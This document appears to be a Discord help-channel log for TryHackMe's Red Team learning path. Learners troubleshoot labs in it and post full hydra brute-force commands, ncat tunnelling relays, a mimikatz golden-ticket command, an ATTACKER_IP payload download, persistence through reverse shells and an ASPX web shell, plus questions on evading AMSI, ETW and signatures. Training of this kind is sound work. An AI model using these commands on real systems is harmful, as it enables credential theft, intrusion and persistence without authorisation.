Evasion using Port Tunneling me is evading me right now... can't navigate to the IP on the browser as indicated using the tunnel I built on the terminal. I'm using the AttackBox btw

I just swapped the ports on the question as indicated on thencat -lvnp 443 -c "ncat TARGET_SERVER 25"line

sent it over to the form and navigated to the site on the port that is not allowed to send traffic to our network and... well, it times out

Hello mate I’m trying to get done with lateral movement but while I set my DNS restart the systemd but the me look won’t resolve to the IP I set neither will the creds accessible anything I’m suppose to be doing that I’m missing ?

I’m using the inbuilt ATTACKbox too

The thmuser3 on Windows Local Persistence Task2 is refusing to login

I made the necessary changes to the RID for hijacking as instructed

I tried both evil-winrm (using both password and hash) and remmina from the AttackBox but no dice on any

Hello, I have a problem by opening shell.aspx in Persisting Through Existing Services

Finally I completed My Red Team Certification @low igloo

you shuuld give permission the shell.aspx file to run on iis web server

🤟

https://static-labs.tryhackme.cloud/sites/opsec-task-7/
wondering why this iframe is so bad, simply a bad UI/UX.
couldn't figure out what to do in the first 5 minutes

Hey guys I'm stuck at red team password attacks task 8 1. I used every possible password to login ftp but none of them contain flag. Can anyone help me?

Are you using a wordlist?

yes

It says you don't need to brute force. How else can you get in ftp without brute forcing?

I tried anonymous login

I tried default passowrs

I just went back and tried again and I was able to get in with anonymous

yes but there is no flag

Yes there is

Look through all folders

Yes, it's in the directory listed in there

OMG.

I didnt see files folder

how stupid I am 😄

Not stupid at all. Sometimes we tend to overthink things

Thanks man 🙂

You're welcome

Enumeration room task5 question 1 dig command dosnt work with -t AXFR any help?

What do you mean it doesn't work? What happens?

Did anyone have any issues with this?

transfer failed

; <<>> DiG 9.18.0-2-Debian <<>> -t AXFR redteam.thm@10.10.41.68
;; global options: +cmd
; Transfer failed.
                     

a lot of people. Check that you replace the hex number, not add. There has to be a 00 at the number 3 at offset 30, not 03 or something else. Restart the machine, use xfreerdp or remmina, winrm won't work. Try both

Try it with a space between the name and @

that, redteam.thm isnt't a username, it's the domain and @twilit prairie.10... is the dns server

Well, yes. Thats what I mean though

@manic umbra I tried both winrm and remmina on the AttackBox but next time I go for it I will make sure to replace he hex, and not add. I'll let you know how that goes

Winrm didn't work for anyone as I recall. I first had problems too, but yesterday after redoing it with a guy from here, it was an instant win. Reboot might really help

Can someone confirm how large the password list should be for https://tryhackme.com/room/passwordattacks - Task #8 -- Challenge 4?

I think i'm doing it correctly but my password list is prohibitively large

ETA is like 2 hours

537026

if shadow checked the right list

thanks, that's how large mine is as well.

for more help if you need it shadow would like to see your hydra command.... of course you can skip that and try on your own

hydra -t 64 -T 128 -l burgess -P pass.lst 10.10.56.25 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

the -T gets downgraded to 64

shadow sees an error

you should be attacking the post form for burgess

yeah i see it

lol

thank you!

no problem

Hello mate, please I need help with lateral movement task 7 Tunneling complex exploits, the putting whole command together part is confusing and I’m having hard time getting over it I’m I suppose to ssh using the username I login with by replacing tunneluser@attacker_Ip , if no I keep getting prompt to input a password after the initial command what I’m I doing wrong need some help thanks

Thanks again! I got it!

Gave +1 Rep to @royal void

probably more in #lateral-movement-and-pivoting channel if you need help with that network

FHA na

Thanks ***

Please if anyone could help here too would appreciate as the room suggested by @royal void seem to be a lil dry

@royal void I guess I spoke too soon. I was getting a false positive. Here's my new command that I'm trying and it still has a very long ETA

hydra -t 64 -T 64 -l burgess -P pass.lst 10.10.56.25 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:Incorrect username or"

Does this look correct?

almost..... filter on success and logout.php the same way you did for GET also include the -f at the end

Is there a good reason to fail on success instead of failure?

It did work. I'm just curious why my method doesn't work.

sometimes hydra needs to check the page in certain ways to work out

thanks

Gave +1 Rep to @royal void

+rep @velvet root he helped me on DM

Gave +1 Rep to @velvet root

Does anyone know a good place to ask about what appears to be a problem in the "Breaching Active Directory" room? I can't seem to connect to what appears to be the DC host as (well, anything, but also) a DNS server.

#breaching-ad

Thank you!

Gave +1 Rep to @native berry

Can anyone help me with c2

sure if you explain what your problem with it is

Communication over dns protocol of the flag.tunnel.com

Its that im unable to connect to flag.thm.com

Even tried ssh

Got it… solved

what does that have to do with the C2 room???

Dns dude

I'm working on https://tryhackme.com/room/enumerationpe -- Task 5, Q3 -- It seems that snmpcheck is taking a long time to enumerate.. is this expected?

Command I'm using:

snmpcheck-1.9.rb 10.10.115.159 -c public  

and output so far:

snmpcheck.rb v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.115.159:161 using SNMPv1 and community 'public'```

I figured it out -- I'm not sure why, but I had to start snmp manually using

net start snmp

Anyone around that can help me figure out why evil-winrm is taking forever to finish this command?

reg save hklm\system system.bak

This is for room: https://tryhackme.com/room/windowslocalpersistence -- Task 2

I had this problem as well. I ended up just hosting an ftp server on my kali machine and uploaded it via ftp from the windows machine.

Hi can anyone help me out with the network configuration of Breaching Active Directory, i have updated /etc/systemd/resolved.conf but after running nslookup thmdc.za.tryhackme.com i'm getting this output

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

...

any ideas?

data exfiltration task8

pip install netifaces

still the same error

I also tried with simple pip

hi!
i am wondering about this red teamer title. is it optainable after 21. september? also, can you choose which title do you want to use or are you just red teamer after that?

got answer thx

Am I missing something here? Lateral Movement and Pivoting room - Task 3: Spawning processes remotely

Apparently you HAVE to use the payload specified in the instructions and your HAVE to use exploit(multi/handler) to catch the shell. Then you can execute and get the flag

hey guys

I'm getting error in power shell: Invalid namespace

command is: Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

room: the lay of the land -- Host Security solution1

Solved

It's not error read the information properly you will get it ✌️

@echo ore could you please add me as a friend here on discord? I'd like to have a chat about the great lateral movement room 🙂

Anyone having any issues with flag13 in Windows Local Persistance? Follow the steps but it still want's to only get flag12 and not allowing flag 13 to be grabbed

hi

I need help for taske 6 of password attack

red teaming room

Have you read through the Custom Rules section of the page?

Yes

The hint is so close to the answer.

But I tried it is not right

really?

The hint won't give the answer but it is very close

Ok I see

BUt I tried with it

but stil not get the right answer

This is useful - ^[!@#$] add a special character at the beginning of each word. ^ means the beginning of the line/word. Note, changing ^ to $ will append the special characters to the end of the line/word.

Ok

I tried but didn't get the right answer

Finished the path today and got exactly 400 rooms finished. Still enjoying the leaning journey. Thanks for the nice content! 😉👍

somebody doing obfuscation? trying to understand code from task 7. if the reminder of 3 is equal to 1, how the code enter to the switch statement?

Any one up ?

Not sure what's going on here...

This is the Intro to C2 where we set up the apache2 proxy.

Probably you are not using a payload that supports that ?

these ad rooms are top quality @white prairie i think i finally get golden and silver tickets now 😄

i think you need to choose a payload.

even for a listener?

Yes

Anyone win any cool prizes with their tickets yet?

We won't know until Thursday/Friday.

yes shadow got a nice hat

However, I think I got the Pineapple.

guys, i'm stuck with task 4 in sandbox evasion room, none of options is ok, anyone can help me?

I didn't get 3 of anything other than the Red Team and the streak freezes unfortunately

somebody doing obfuscation? trying to understand code from task 7. if the reminder of 3 is equal to 1, how the code enter to the switch statement?

oh is this how to solve it ... xd

I ran the code and got the flag

yay i know... i just wanna understan, the if to enter in the switch case

this?
if(x==1) before the loop?

this if(x%2==1)

cause is true right?

yes

then enter in the ecuation

yes

x=x*3+1

then x = 10

yes

so haow enter in the next if, if x !== 1?

then this condition is false it won't trigger

if(x==1) won't trigger first time

that's the idea of using the collatz problem

the x=10 will keep going in the loop because the condition of the while while (x>1) is true

at the end x will reach 1 and the condition of if(x==1) will become true

what end?

some loops

like four five times

first time is 10, then from there it will incresase the number

dont understanding how the reminder become 1

I can't send pics but check this code

x = 10
while x > 1:
    print("X: ",int(x))
    if x % 2 == 1: 
        x = x*3+1
    else:
        x /= 2

after 5 loops the reminder will become 1...

ah.. got it

registry your token to send pictures

and sent it to the boot

I verified in old account...
so I am waiting to see on of the mods active to ask him to fix that

can someone explain to me why i should do data exfiltration when i can simply copy and paste data through ssh?

Send me a DM about it when you around

I mean, that is data exfiltration. 🙂

what if firewall blocks that?

how for into the red team path are you guys? I'm still in the fundamental modules :c

msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed

Can't get meterpreter

and I had no idea Windows had an ARM version

Certutil doesn't seem to work. I'm just trying to upload man...

so u already got the shell running on the machine in metasploit?

have u tried powershell -c 'wget ...'

powershell doesn't want to respond.

can't even run the damn thing

ok, nothing is running...

big surprise

i have shell in Armitage, yes

it doesn't have powershell or sth?

Not sure, but it hasn't worked. Had to restart Armitage 4 times after shell/target stops responding. Powershell never runs.

and the ARM error has me confused

In Task 5 of Windows Local Persistence (Abusing Scheduled Tasks) I get the reverse shell but it refuses to execute flag9.exe as if I were missing something... and I just recreated it with a difference service trying to run as SYSTEM but still no flag 9... any ideas? got it

I'm just going to run on msfconsole, see if that works. So far, Armitage is very disappointing.

yup... works. Go figure.

there's gotta be a better free option. Or perhaps it's something on my end. I don't really know.

I'll give Empire a try

Msf is alright, just this thing...

change the name of the scheduled task

you don't need meterpreter

Then how do you upload?

wget , powershell , smbserver ,etc...

already mentioned those. Didn't work.

It's fine. It was Armitage. It's broken, at least for me.

show

did wget result errors?

They all work just fine through regular Msf. Not with Armitage was my point.

what is wrong with armitage?

it doesn't run the exploit?

No, it runs the exploits but the shell seems to be really unstable, for some reason. Not sure if it's my system or the program.

I've requried a restart about 5 times. What should have taken 10 minutes took me 3 hours...

Major pain in my ass... lots of hoing and humming...

and deep-breathing techniques

try updating it

because the reverse shell wasn't crashing with me

unless you tried to upgrade to meterpreter

I installed via apt but either way, i would like to try other C2's

So, if it's not up-to-date then I must be crazy, heh

I haven't liked it from the beginning. That module took me 2 days to complete Eventually, just used msfconsole and it went perfectly

nice

then just try another

yeh

I need hint for room Signature Evasion task 2 To the nearest kibibyte, what is the first detected byte?
I don't know what does it exactly mean

exactly same question

What is the base addresWhat is the base address for the ETW security check before it is patched?

This two question is very wrost in tryhackme task

hi there, please anyone could let me know how to make Teamserver (Armitage) work? :S I've tried couple things but nothing really works...

I also gave up on Armitage on that room. I think maybe Armitage + msf6 have an issue. Which isn't too surprising as I think Armitage is going to be stagnant from now on.

I didn't try it, but someone industrious could try using something like kali 2020.

Or downgrade msf6.

yeah what a shame :(, just completing the room with armitage from apt and msfconsole.

I think I am lucky for not having such issues with armitage

Can I ask if I want to have red teamer title in Tryhackme, do I need to finish the path before 22nd?

No, you have to finish rooms, receive tickets and with some luck you get 3 tickets for this title. Lucky for you, they are unlimited 🙂

BUT: "The ticket promotion ends on the 21st of September 2022, 11:59 PM BST!"

so you'll have to hurry up 😅

😂

In task 8 question 3 I am unable to get a successful login.
I am using the cewl wordlist with a min length of 3 and depth of 10. I've tried a few different rules but the hint seems to say to use the clinic.lst which was the name of the cewl file.

anyone have advice? I'm starting to think it's the username phillips that is incorrect.

Oh, this is for the password attacks module btw.

it is not a module it is a room but okay lets start here

Thank you for the correction @royal void

Gave +1 Rep to @royal void

if you run wc -l clinic.lst what do you get as output???

366

well then that is where you problem lies

10 might be too short, unless the instructions crafted your cewl command with that.

check the command in the task 7 for the command

i.e your list is to large

it should be about 3 times smaller

ok, now it is 105

then now try using hydra for the phillips account

|| hydra -l phillips -P /tmp/clinic.lst 10.10.188.101 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed"||

I ran that, no successful login

dunno if that would work but here you go for another hint ||see if you can use the :S=something to make hydra know it is a success instead of a failure||

Yes, 16 passwords found in that case.

changing back to F I get nothing. So either the username is wrong, or the password list is incomplete?

try with the -f flag for hydra too

which is placed at the end of the command

||hydra -l phillips -P /tmp/clinic.lst 10.10.188.101 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed" -f Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-20 15:10:14 [DATA] max 16 tasks per 1 server, overall 16 tasks, 105 login tries (l:1/p:105), ~7 tries per task [DATA] attacking http-get-form://10.10.188.101:80/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed 1 of 1 target completed, 0 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-20 15:10:21||

lol sorry for the messy output...0 passwords found.

you did not try with :S=something as you should have

wonders if nobodynate got it now

@primal kernel got it???

Sorry had to afk for a min. I did run with S and the first job on each threat returned success. I got 16 successful passwords with S

bonk

fine lets just give you the correct command so you can compare

||hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f||
you will need to change the ip but other then that it should work

woah, that's odd

It worked...but I'm extreemly confused why

How would someone know a success will redirect to logout.php without already logging in successfully?

the -f states to only use the first correct results and disregard any others

you know it runs php.... you also know that there tends to be logout options on logged in web pages

well thank you for your help @royal void . I still think this is quite a jump for someone to make but I appreciate you helped me get through it.

Gave +1 Rep to @royal void

no problem

might be easier if you know how hydra can be finicky

oh, I've never heard of hydra being finicky. I'll have to read into it more.

I need som help in the Password Attacks room with the Hydra tool, when i try the SMTP i get SMTP LOGIN AUTH, either this auth is disabled or server is not using Auth.

have i missed some arguments in hydra ?

what is you command??? most likely you forgot that you need the full email address for it to work

hydra -l pittman@clinic.thmredteam.com -P wordlistclinic.txt smtp://10.10.10.50 -v

and i have tried with smtp://10.10.10.50:25

hydra -l pittman@clinic.thmredteam.com -P custom.lst smtp://10.10.48.200 should work if you replace the ip address

where is custom.lst ?

that is the name of the wordlist you made with the john command

dont i need to replace that to my wodlist file i have created ?

yeah you would need to replace that too

oversight by shadow there

if it still does not work could you do wc -l nameofyourwordlist and tell shadow the number???

2800

that is way to short

then i need to backtrack my steps, but i still get the error on the SMTP Login Auth

should it not just say it failed ?

¯_(ツ)_/¯

or is it couse i dont run as root ?

no you should not need root for this as it should work fine without

is 5600 a better result for the wc -l ?

better yes.... enough for it to be as long as it is supposed to be??? no

shadows list is a 21000 lines

iam i doint the john part wrong

english is not my main lang and i have dyslexia so i am use to do some misstakes becouse i dont understand all completly

fair

the rule you should be using with john should look like Az"[0-9][0-9]" ^[!@]

well it does i think, let me check

and then to generate the list you do john --rule=thm-rule-name-here --wordlist=clinic.lst --stdout | tee name-of-new-wordlist.lst

my rule is Az"[0-9][0-9]" ^[!@$#]

huh why did it make a smaller list then....

is my clinic.lst to small then?

i runt cewl with -d 8 -m 5

run -t

cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/ is the command you should have used for the clinic.lst

as it states for you to do in task 7

that resultet in the first list that only had 2600

wonder if my firewall blocks the page

the clinic.lst is 105 lines long

i really think my fw blocks the page 😄

maybe

Mmm.. I have a VBScript that runs calculator but it doesn't want to with cmd.exe. Is AMSI or something preventing this?

think something prevents it from opening it graphically

because some cmd instances showed up in taskmanager when shadow tried

Well, that's not helpful...

not you, the script.

The script isn't helpful...

yup... they're all there on task manager

just floating around

It wouldn't give me NT AUTHORITY anyways, would it?

Wscript probably runs as the user

not sure

Its my parrot install thats is messed up. If i run it in the attackbox it works and i get more result. if i run cewl in my vm kali i get more. its a local issue but thank you very much for you help. My brain needs this exersice or how its spelled 😄 Thank you!

Gave +1 Rep to @royal void

no problem.... glad you could figure it out

maybe it is some cewl version error or something else is the cause

Maybe, Parrot runs 5.4.8 and attackbox 5.3

It could maybe be a version issue with hydra as well as i get these strange errors. but i will check that tomorow after work 😄

Anyone else facing problem in attack box in data exfiltration task 8 , unable to netplan apply

Try it with kali machine instead

Tried but I feel my configuration is not set . Not getting the correct ip for flag.thm.com

Anyone completed Task 10 (Real World Scenario) of Evading Logging and Monitoring?
I can't get it thru' after more than 5x tries....
Already checked but still got caught...

Please share. Thanks

Only one more section left: Host Evasions!

K... this is a n00b type question but here it goes: In the 'Signature Evasion' room Task 2 'Signature Identification' it says we should use the native tools head, dd, and/or split. These are native to Linux, and the files (e.g. shell.exe) are on the Windows machine. How did you transfer the files from the Windows machine to the AttackBox?... please be nice LOL

if port 22 is open u can try scp

I tried scp but it refused to connect via 22

I will try it again later. Thanks @main oyster for the suggestion!

Gave +1 Rep to @main oyster

scp uses port 22 to transfer that's why i asked if the port is open

I don't think it was when I did the nmap scan... I had tried to connect via smbclient but the user has no workspaces available, this why I asked here... kind of out of ideas on this one

From AttackBox,
$ python3 -m http.server

Then on Powershell,
wget http://ATTACKER_IP:8000/filename.xxx -O filename.xxx

That would work well if the files were on the AttackBox to get them from the Windows machine... but this is backwards...

or maybe I'm getting the room wrong. The files are in the Windows machine (i.e. shell.exe) and the tools it talks about being native are native to Linux... i.e. split, head, and dd

Signature Evasion Task 2 - Signature Identification

thanks anyways @ripe basin for taking the time to answer

Gave +1 Rep to @ripe basin

no issue at all 😎

Heyy
What is the base address for the ETW security check before it is patched ? Evading logging and monitoring room

I've logged into attackbox through the browser, setup armitage, scanned for hosts but there aren't any Windows hosts, just 8x Linux machines (including the attackbox). Any ideas on what I'm doing wrong?

Are you scanning a network range, rather than the specific target machine IP ?

What up peeps

decided to make it a point to have discord open when studying

Gets me in the community i guess

if that makes since

probably should hang out in #general then

your right, just seen this path and im studying it lol

ah

good luck

I've tried scanning both the /24 network but no idea what the victim_ip is suppose to be. In the screenshots they are scanning 10.10.176.100/32 but the attackbox that booted up for me was on 10.10.10.0 so scanning 10.10.176.100/32 didn't produce anything.

on Evading Logging and Monitoring: Task 10. I'm running the gpp-bypass.ps1 script clear event logs run the agent.exe file and I still get the Traffic halted, you got caught the message. when checking the registry I do see the values are 0 meaning logging is disabled, so how when running the script I can still see logs in Microsoft/windows/PowerShell/operational?

I also disabled the Scriptblock logging via gpedit.msc and I can still see logs when running agent.exe 🙂

Now its fixed 😄 I needed to update ruby and after this both the cewl and hydra commands worked fine. Thanks again for you help and for giving me to redo my steps and eventually find my issue. the hydra command fixed the password in 1 sec 😛

Gave +1 Rep to @royal void

You have to start the target machine that's attached to one of the tasks by pressing the green "Start machine" button (not to confuse with the blue "Start attackbox" button)

That should then give you a box like that, where you can find the target machine IP:

I had similar issue too...

were you able to figure out what caused it?

Thanks, much appreciated!

Gave +1 Rep to @native berry

Nope... I redo and recheck... still not successful. 😠

And it is the last task in Red Teaming path...

yeah, strings etc.....was next on my list 🙂

Anybody have problems with Network Security solutions task4 and Task5 in task5 it says i should be able to access port 8080 on box spawend in task4 but inaccessible and reported as closed with nmap

never mind just took a while for the service to start.

nice..... now continue your learning journey

The network in Breaching Active Directory seems fubard atm, cannot ping or resolve thmdc.

its started and its pointing to the thmdc ip 10.200.55.101

okay iot was started i just stepped away for 30mins

now i just started it again

but still no resolve.

had to double restart systemd >< any hoo, here we go again i will be back if further issues come up

Wow... thanks @weak ice 👍

Gave +1 Rep to @weak ice

Hello, in Windows Local Persistence Task 2. I added the thmuser1 to the Backup Operators and Remote Management Users groups, but I still can not connect via rdp. Is there other password for this user instead of Password321?

me too, same issue! did u understand why? [RESOLVED]

Abdy i belive that you should add user to Remote Desktop Users group also. That's Windows requirements...

https://tryhackme.com/room/winadbasics im on Task 3
What would be the name of the machine account associated with a machine named TOM-PC? im looking over the active directory and existing machines use PC-<name> LPT-<name> SRV-<name> or SVR-<name> but none of that works with TOM? its supposed to be 7 letters

lol solution was trivial simply $ at the end

heads up seems like some of the rooms will have access expire in 2-3 days in the ad section

I added the user to the both groups that is said in the requirements. Is there a third one? I added to Remote Management Users, not Remote Desktop Users

Show a screenshot pls

Anytime i submit a flag for the OPSEC room , i get a confirmation it's the correct answer but the task doesn't get marked as completed even when all the questions are answered.

eg: Task 2 is answered but doesn't show as completed.

I'm having issues starting the Windows box for Protecting and Stripping Identifiable Information. The box is grayed out. I terminated both machines because I was finding problems, but when I restarted the machine the Windows machine won't start but the Ubuntu attackbox restarted. Is there a reset option?

I'm just gonna install the compilation toolchains locally and then when the Windows box can start again i'll upload it.

Never mind. Solved. Outside of CreateRemoteThread function you can just take the other indicators and use echo -n maliciousHandle | rev to auto-generate new handles and it’ll work. I didn’t realize I just had to navigate to the IP to submit the exe file

The correct progid is txtfile, not textfile. You have an extra E

Hey is anyone else having issues in the Password Attacks room and unable to access https://clinic.thmredteam.com/

How to check who is winner of red teaming path

Prizes?

Room:Firewalls Task:7 does anyone gets the ncat tunneling to work?

Yup 😄

well, i assume the port forwarding is done on the same server so the listening port of 8008 is the same as the forwarded port (for any other port I'm getting connection time out (that tells me the FW blocks the connection) but i can't get that to work

I used nc on a different port. 🙂

well i tired other ports as well, 8081 for example, cant get it to work

Are you doing it just now?

yes

VM or Attackbox?

attackbox

Infact I'll test it in attackbox, it shouldn't be different,

the connection just times out

which makes sense if there is a FW blocking all other ports

So you see

Ncat: connection from IP:Port ?

im using ncat -lvnp [port] -c "ncat localhost 8008" on the web form

Yes

Did you E-mail for any?]

I did it a different way.

email?

so that is the correct way?

No

hello+tickets3@tryhackme.com

You're both mixing yourselfs up with isn't helping lol

@zealous wind
nc -lvnp 21 in a terminal window first
ncat attackboxip 21 -c "AttackboxIP 80" Firefox window

If you E-mailed during the event for the big prizes, you'll be E-mailed back within 2 weeks.

Ok

@zealous wind have you done the steps?

i dont get it, if i create an NC listener on port 21 on the attack box and then run a ncat command from the remote server, shouldn't it be on port 21 as well?

Yup, I missed that part out lol

so i should be expecting a shell from the remote server?

cause im not getting one 🙂

Can you share a screenshot?

attackbox

You have one DO these steps.

I cannot received the 9th flag... however I run the schtask reverse shell and deleted the reg value

web form

GET / HTTP/1.1 hit enter
host: default enter

On the terminal that is listening

im not getting any connection back

Hit enter twice more

nothing

Screenshot?

this is the command i put in the webform on the remote server ncat 10.10.110.204 -c "10.10.110.204 21"

No.

ncat 10.10.110.204 21 -c "10.10.110.204 80"

fixed it, still nothing

Did you not get a connection on the nc?

Can you DM me?

I am facing a problem in the password attack room in task7
I am supposed to create a word list from. The website

clinic.thmredteam.com

But this website isn't available!

same for me maybe THM staff can restart the service https://clinic.thmredteam.com/ plz

Hi guys I cannot connect to lateral movement network. I used attackbox kali vm and my own machine and none of them did not connect to network
ROOM: Lateral Movement and Pivoting

How to change permissions in iis apppool Windows Local Persistence room flags.exe

I was not understanding please help me

I don't recall needing to change permissions in the iis apppool?

You need to run something in the web server with its permissions.

is there anyone using hashcat on windows to help me with the installation?

You should review this command, that doesn't look right.

Did you download the correct vpn pack && change your dns?

yes

Can you cat

/etc/resolv.conf

10.200.19.101 needs to be above your nameserver.

Either that or you can delete 192.168.0.1 all together, just need to remember and change it back

im on the exploiting ad room working on task 8 and i ran the necessary commands but keep getting told that \thmrootdc.za.tryhackme.loc\c$\ doesnt exist. ONe thing that im not sure of atm is when you run kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password hash of krbtgt user> /sids:<SID of Enterprise Admins group> /ptt i noticed that the previous command lsadump::dcsync /user:za\krbtgt doesnt give me an rc4 hash ? not sure which hash im to use

probably more help to be gotten in #exploiting-ad channel

rgr that leave it for me to assume this be right just because its on this path 🙂

Seems I'm doing something wrong in https://tryhackme.com/room/signatureevasion Task 2, manual signature identification.
When I upload the shell.exe, I get an alert. If I split the file in half with split --bytes 36901 shell.exe and upload both halfs, I don't get any alert. I suppose the signature wasn't right there at the half and I splitted it 😄 Am I using the tool wrong. Any other tool I should use ?

oh, forgot, yes, I moved the files in a folder that are not excluded from defender, it detects shell.exe after all (c:\uploads)

I'm stuck on Task 4 in the Passwordattacks room

I Thought i was putting the right crush commands and it even works in terminal but the question is saying I'm wrong:
"crunch 5 5 -t THM@! -o tryhackme.txt"
What am I missing?

https://web.archive.org/web/20211228080331/https://clinic.thmredteam.com/
@white thunder
I used the web archive in order to create wordlist
Go for this URL, working fine for me

Thanks @gilded edge

Gave +1 Rep to @gilded edge

I don't get where we're seeing that Doman Users has the AddMembers ACE?

Room: https://tryhackme.com/room/exploitingad
Task 2

Just Generic Write

Hi, i'm doing the Enumeration room,
I never found any port higher than this number highlighted and it is not accepting it
is there anything wrong ?

I used the command "sudo netstat -tlp"

No, there definitely is one bigger.

Plus that answer has hinted its a 4 digit port

oh i found the correct command to be "sudo netstat -tlpn" to show the numeric port number instead of port name

I am currently in the Password Attacks room and I am trying to run the "cewl" command on https://clinic.thmredteam.com/ and I keep getting "Unable to connect..." errors - is the site down? I am connected using my own Kali VM over OpenVPN.

#red-teaming-path message

Thank you, I didn't see that - should probably research a little further before asking next time...

Gave +1 Rep to @orchid swift

Hey everyone, the domain issue is being investigated. Thank you for your patience

any suggestions?

Guys anyone knows,
Where i can download free active -directory pen testing videos

That was it. Thanks for the tip!

Gave +1 Rep to @weak ice

This issue has been resolved. Please allow 24 hours for the DNS records to repopulate

imo you could start after the first three listed ones. And always have an eye on the recommended knowledge mentioned in the beginning of each room, sometimes there are suggestions and references to other rooms

Hello, I get this error in Data Exfiltration room Task 6. Can somebody take a look?

thanks :)

Gave +1 Rep to @feral sage

hey, i'm working on persistance task 6 flag 13. I set the environment variable as described in the task, pointing to my shell but i can't receive a connection back. Somebody else faced this issue and knows a fix?

Might want to share a screenshot of your registry editor

Ah sure

And did you sign out and back in?
Or you just disconnected the RDP and connect again ?

Yes i did ...

Did the previous section for winlogon work fine, so you are using the same attacking machine as for that previous section?

I guess you either double check all the settings for you msfvenom payload, especially to use the exe format and not exe-service

Or might want to try to restart the target machine and start all over

No I'm using a different one, because i already tried restarting it a few times

previous tasks worked fine

msfvenom command is correct

So what are you using as your attacking machine, the attackbox or your own machine ?

my own machine, i'll give it a try with the attack box

K, might want to check ip a s if you have just a tun0 interface or any extra like tun1, tun2 etc.
If that's also not the case and it's not working with the attackbox either, I can only think of some sort of issue with the payload you generated

doesn't work with the attack box either, the payload works fine... i tried it out by just executing the exe on the machine and got a shell, both on the attack box and on my own

I mean, if you receive the shell by just executing it, then you sure your exe is in the right path, as you specified it in the registry ?

I recently did that room too and that task was working just fine

I double checked everything

You got the target machine open right now? If so, if you let me have the IP of it, I could rdp into it myself

i have, should i dm it to you?

Yes

Hello, in Windows Local Persistence Task 2 Special Privileges, when I open the window permissions from powershell, I can not see my thmuser2 there

Just add it

Oh yeah, sorry... I didn't see it

I still have a problem. First, when you work with secedit and export the config file, do I have to edit that one from the Administrator home directory?

Shouldn't matter as long as you can open and edit it

Ok, I still have some problems, but I think is because I restarted the machine. I will try again in a few hours, thanks!

Hi, i don't know if im doing something wrong but in the third part of the second task of Windows Persistance i have to open the Windows Registry acording to a path

Which is HKEY_LOCAL_MACHINE > SAM > SAM > Domains ...

But in the Registry Editor of the prepare machine of the room doesn't appear the Domain directory

Any suggestion?

Ahh sorry

i forgoted run it with PsExec64 heheh

Is working now, thanks!

Gave +1 Rep to @native berry

Does THM Stopped Giving Tickets For Red Team Path?🙂🔥

Yes

I've recreated this, terminated the entire network and started over, and I always end up back here. So, what am I doing wrong?

I was also struggling hard with this task. Also had to begin from scratch once. But if you also follow the short videos step by step it will work, trust me. Keep in mind to execute the commands on the correct machines, i guess in my first try I messed up some of the steps.

Hi! I can't retrieve the flag9 form the 5th task of the persistance room, i have repeat the whole process twice and i still don't get it

i was likely to think that it could be my fault but, the process seems prety simple to be my mistake two times so i think that something is wrong

Someone can help me with the flag?

did you remove the thingy in the registry and then query for it on the main account???

You mean the SD file?

Yes opening the Registry Editor as SYSTEM with PsExec64

and then i query it and it gives me an error

hmmm

Nobody have the flag?

shadow has the flag but just sharing it outright is kinda not allowed

im understand 😦

still think it might be something you missed or did wrong but dunno what

I think that i will continue with the path and i will come back later in time

yeah that is a good idea

yes, thanks any way!

Sorry for the kind of cryptic errors there. Your issue seems to be you haven't removed the SD registry entry. If you just deleted its contents, the flag validator might complain.

Does The Red Team Event Ended?🙂🔥

yes

Hi! Thanks for answering, but i already delete it two times. Foremore, after delete it i try to query my service and it can't be located, so i guess i delete the SD file correctly. Thus, i don't know what else im doing wrong.

Gave +1 Rep to @echo ore

What is the purpose of the quotes in THM passwordattacks room, task 4, question 2 for crunch?

To make sure every character in there should be used as such.
E.g If you have a word like Hello\World it's not using the backslash in the wordlist without quotes
I guess the special characters used by crunch itself are exempt from that.

tes

Hi i wanted to ask a question about evil-winrm

Am i correct by saying that it's SSH but on steroids? Its limited to Windows WinRm service only. But how is it able to do tasks like AMSIBypass so easily?

Also Powershell modules are pretty easy to load for in-memory execution..

well evil-winrm ist not just a winrm client, it has a lot of built in stuff I guess

WinRm is not a malware
it's windows remote management

https://learn.microsoft.com/en-us/windows/win32/winrm/portal

The stuff on the image does NOT trigger a reverse shell, but doing the exact same thing in cmd.exe works. Anybody knows why?

try to specify the full cmd path

same result. Again, in cmd.exe the exact same commands work. I wonder if it has to do with some subtle difference in echo

they definitely do somthing different

no I don't think so

echo '1'>test.txt

Still different hashes

it has nothing to do with this difference in echo
but maybe the difference is because of the end line character "\r\n" / "\n"

yeah thats what I mean, maybe PowerShell does a different newline that breaks the .bat script?

this should not happen

you mean the bat script breaking?

yes

if you want to make sure about that
use the bat file created using cmd

Is there an issue with data exfilitration room task 7 ICMP? Every time I run a command in the terminal it locks up and doesn't let me do anything for 2-5 minutes.

I've restarted numerous times killed all other connections. I'd really like to complete this without using the attack box.

Is that in the AD portion? If so I'm having technical difficulties as well within the domain

No it's in Data Exfiltration

Recon the file maybe, look for strings in the file

im late

nvm

Hello guy's, is anyone also experiencing this issue while trying to RDP into any machine on the redteaming path?
Room: The Lay of the land

Thanks! But the problem it's already resolved!

Gave +1 Rep to @half bramble

xfreerdp gives me issues a lot of the times. I usually just use Remmina

Hello, I can see that a lot of commands are done with psexec in the Windows Local Persistence room. How can you make these in a real life scenario?

Also, flag13.exe is not working. I got the reverse shell but I am able to get the flag12 instead of flag13

